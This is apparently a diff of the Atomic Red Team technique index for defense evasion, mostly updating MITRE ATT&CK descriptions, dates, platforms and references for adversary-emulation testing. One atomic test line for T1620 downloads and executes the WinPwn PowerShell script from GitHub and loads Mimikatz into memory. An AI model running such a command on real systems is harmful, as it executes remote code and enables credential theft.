       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests:
     - name: Indirect Command Execution - pcalua.exe
@@ -7992,7 +8060,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests:
     - name: Deobfuscate/Decode Files Or Information
@@ -8334,17 +8401,20 @@ defense-evasion:
         elevation_required: false
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -8353,15 +8423,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -8399,15 +8471,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests:
     - name: Windows Disable LSA Protection
@@ -8491,7 +8565,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -8539,8 +8613,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests:
     - name: Thread Execution Hijacking
@@ -8559,7 +8631,7 @@ defense-evasion:
         name: powershell
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -8575,7 +8647,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -8600,6 +8672,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -8617,8 +8690,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -8631,7 +8704,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests:
     - name: System File Copied to Unusual Location
@@ -8679,7 +8751,7 @@ defense-evasion:
         name: powershell
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -8716,9 +8788,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -8756,9 +8827,8 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests:
     - name: Copy and Delete Mailbox Data on Windows
@@ -8895,7 +8965,7 @@ defense-evasion:
         elevation_required: true
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -8998,7 +9068,6 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests:
     - name: Shellcode execution via VBA
@@ -9410,7 +9479,7 @@ defense-evasion:
         elevation_required: true
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -9494,7 +9563,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -9561,7 +9629,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests:
     - name: mavinject - Inject DLL into running process
@@ -10027,55 +10094,73 @@ defense-evasion:
         elevation_required: false
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests:
     - name: Set a file's access timestamp
@@ -10501,7 +10586,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests:
     - name: WinPwn - Reflectively load Mimik@tz into memory
@@ -10516,6 +10600,74 @@ defense-evasion:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           mimiload -consoleoutput -noninteractive
         name: powershell
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -10579,57 +10731,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -10644,6 +10749,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -10653,9 +10764,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -10665,8 +10781,44 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests:
     - name: Delay execution with ping
@@ -10695,7 +10847,7 @@ defense-evasion:
         name: sh
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -10741,8 +10893,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -10761,13 +10913,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests:
     - name: CMSTP Executing Remote Scriptlet
@@ -10940,7 +11091,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests:
     - name: Disable Windows IIS HTTP Logging
@@ -11134,7 +11284,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -11173,8 +11323,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests:
     - name: Control Panel Items
@@ -11225,7 +11373,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -11264,12 +11412,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -11296,6 +11442,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -11313,12 +11460,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
